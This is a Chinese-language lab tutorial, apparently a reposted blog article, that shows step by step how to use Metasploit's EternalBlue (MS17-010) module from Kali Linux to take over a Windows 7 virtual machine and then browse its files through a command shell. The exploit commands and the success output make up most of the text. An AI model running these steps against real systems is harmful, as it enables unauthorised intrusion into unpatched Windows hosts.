原來黑客是這樣獲取你計算機管理員權限!「實戰」

作者:一一奇聞 目錄:生活百科  時間:2023-06-25 

一、背景介紹

Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework,簡稱叫做MSF。Metasploit作為全球最受歡迎的工具,不僅僅是因為它的方便性和強大性,更重要的是它的框架。它允許使用者開發自己的漏洞腳本,從而進行測試。Metasploit(msf)究竟威力如何呢?如何利用木馬控制受害者主機呢?接下來讓我們一起學習!


二、資源裝備

1.安裝好 Win7的虛擬機一臺

2.整裝待發的小白一個。

3.安裝好的Kali Linux虛擬機一臺。


三、攻防實戰

3.1 利用Metasploit(msf)滲透框架對目標主機進行攻擊,如下圖所示。

步驟1:啟動Metasploit(msf)滲透框架,如下圖所示。

命令:msfconsole



步驟2:Metasploit(msf)滲透框架啟動成功,如下圖所示。



步驟3:檢索漏洞,如下圖所示。

命令:search 漏洞編號

例子:search ms17-010



步驟4:檢索到有關漏洞的利用模塊如下圖所示。

步驟5:選擇對應的漏洞利用模塊并使用,如下圖所示。

命令:use 漏洞利用模塊名稱

例子:use
exploit/windows/smb/ms17_010_eternalblue



步驟6:查看使用的漏洞模塊需要設置的參數,如下圖所示。。

命令:show option

步驟7:設置攻擊參數,如下圖所示。

命令:set rhosts 受害者主機IP

例子:set rhosts 192.168.78.160



步驟8:查看對應的參數是否設置成功,如下圖所示。

命令:show options



步驟9:運行漏洞利用模塊,如下圖所示。

命令:run



步驟10:如下圖所示,成功拿下目標主機

提示:ETERNALBLUE overwrite completed successfully!



3.2 進入后滲透階段,利用DOS命令控制目標主機,如下圖所示。

步驟1:進入Windows系統的cmd窗口,如下圖所示。



步驟2:利用命令查看受害者主機的文件夾信息,如下圖所示。

命令:dir

切換文件夾目錄:cd 文件夾名

切換盤符:cd 盤符名


本文地址:https://www.www.wuyouwg.com/shougong/135965
本文標題:原來黑客是這樣獲取你計算機管理員權限!「實戰」
版權聲明:本文為原創文章,版權歸 一一奇聞 所有,歡迎分享本文,轉載請保留出處!